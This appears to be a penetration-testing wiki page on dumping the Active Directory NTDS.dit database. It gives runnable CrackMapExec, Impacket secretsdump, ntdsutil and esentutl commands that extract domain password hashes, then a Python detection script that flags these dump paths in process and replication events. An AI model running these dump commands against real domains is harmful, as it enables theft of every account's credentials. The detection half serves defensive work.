# NTDS

The NTDS.dit file (NTDS) is the Active Directory database. It stores confidential directory information such as usernames, objects, groups, and password hashes. Once the NTDS.dit file has been retrieved, an attacker can effectively impersonate any member of the domain. The file lives on Domain Controllers, so full domain compromise has to occur before it can be retrieved.

### Exploitation

CrackMapExec and Impacket are the easiest ways to remotely dump the NTDS.dit after Domain Administrator credentials have been obtained:

```bash
# CrackMapExec (the target DC and the double-dash --ntds flag are required)
crackmapexec smb $dcip -u $user -p $password --ntds

# Impacket (only the NTLM hashes, pulled through directory replication)
impacket-secretsdump -just-dc-ntlm oasis/administrator@$dcip
```

Alternatively, [an attacker can dump the NTDS.dit manually](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration) if they have a shell on a Domain Controller:

```bash
# Dump the NTDS with ntdsutil (IFM media set written to c:\temp)
# It should be noted that this works on older machines when Secretsdump and vssadmin fail
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

# Dump the password hashes offline from the copied hives and database
impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

# LOLBIN alternative: copy ntds.dit out of a Volume Shadow Copy with esentutl
esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\Windows\Tasks\ntds.dit
```
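Both dump paths on this page leave distinctive traces: the remote secretsdump route requests directory-replication rights (logged as Security Event ID 4662 with the replication extended-right GUIDs), and the on-host route shows up as ntdsutil, esentutl or vssadmin process creations. The following detection logic is an added example, not code from the original page or from the tools it describes. The event records, the OASIS domain name, the `jdoe` account and the `DC01$`/`DC02$` machine accounts are constructed for the example; the three replication-right GUIDs are the well-known Active Directory schema values.

```python
"""Detection logic for the NTDS.dit dumping paths described on this page.

Added example, not part of the original page or of the tools it mentions.
It scans two constructed event streams: Sysmon Event ID 1 (process creation)
records for the on-host ntdsutil / esentutl / vssadmin paths, and Security
Event ID 4662 records for the directory-replication rights that a remote
secretsdump -just-dc* run exercises. Events are simplified dicts
(constructed), not parsed EVTX; field names mirror the Windows fields.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Well-known AD extended-right GUIDs that a replication request needs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Command-line patterns for the on-host dump commands shown above.
PROCESS_RULES = [
    ("ntdsutil IFM export", re.compile(r"ntdsutil.*\bifm\b", re.I)),
    ("esentutl VSS copy of ntds.dit", re.compile(r"esentutl.*/vss.*ntds\.dit", re.I)),
    ("vssadmin shadow copy creation", re.compile(r"vssadmin.*create\s+shadow", re.I)),
]


@dataclass
class Finding:
    event_id: int
    rule: str
    subject: str
    detail: str


def check_process_event(ev: dict) -> Optional[Finding]:
    """Flag Sysmon EID 1 records whose command line matches a dump pattern."""
    if ev.get("event_id") != 1:
        return None
    cmd = ev.get("command_line", "")
    for name, pattern in PROCESS_RULES:
        if pattern.search(cmd):
            return Finding(1, name, ev.get("subject", "?"), cmd)
    return None


def check_replication_event(ev: dict, dc_accounts: Set[str]) -> Optional[Finding]:
    """Flag EID 4662 records that request replication rights from a non-DC account.

    DC-to-DC replication legitimately exercises the same rights, so the
    machine accounts of known Domain Controllers are allow-listed.
    """
    if ev.get("event_id") != 4662:
        return None
    subject = ev.get("subject", "?")
    if subject.upper() in {a.upper() for a in dc_accounts}:
        return None
    rights = []
    for prop in ev.get("properties", []):
        guid = prop.strip("{}").lower()   # logs wrap GUIDs in braces
        if guid in REPLICATION_RIGHTS:
            rights.append(REPLICATION_RIGHTS[guid])
    if not rights:
        return None
    return Finding(4662, "replication rights used by non-DC", subject, ", ".join(rights))


def scan(events: List[dict], dc_accounts: Set[str]) -> List[Finding]:
    """Run both checks over an event stream and return every finding."""
    findings = []
    for ev in events:
        hit = check_process_event(ev) or check_replication_event(ev, dc_accounts)
        if hit:
            findings.append(hit)
    return findings


# Constructed sample events (hypothetical OASIS domain, borrowed from the page's example).
SAMPLE_EVENTS = [
    {"event_id": 1, "subject": "OASIS\\jdoe",
     "command_line": 'ntdsutil.exe "ac i ntds" "ifm" "create full c:\\temp" q q'},
    {"event_id": 1, "subject": "OASIS\\jdoe",
     "command_line": "esentutl.exe /y /vss c:\\windows\\ntds\\ntds.dit /d c:\\Windows\\Tasks\\ntds.dit"},
    {"event_id": 1, "subject": "OASIS\\jdoe", "command_line": "notepad.exe report.txt"},
    {"event_id": 4662, "subject": "OASIS\\DC02$",          # normal inter-DC replication
     "properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}", "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
    {"event_id": 4662, "subject": "OASIS\\administrator",  # user account pulling secrets remotely
     "properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}", "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
]
KNOWN_DCS = {"OASIS\\DC01$", "OASIS\\DC02$"}

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS, KNOWN_DCS):
        print(f"[{f.event_id}] {f.rule}: {f.subject} -> {f.detail}")
```

The DC allow-list is the important design choice: 4662 with replication rights fires constantly for legitimate inter-DC replication, so the signal is the subject account, not the event itself. Auditing of 4662 must be enabled (Directory Service Access) on the Domain Controllers for the replication check to have anything to read.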

### References

{% embed url="https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration" %}
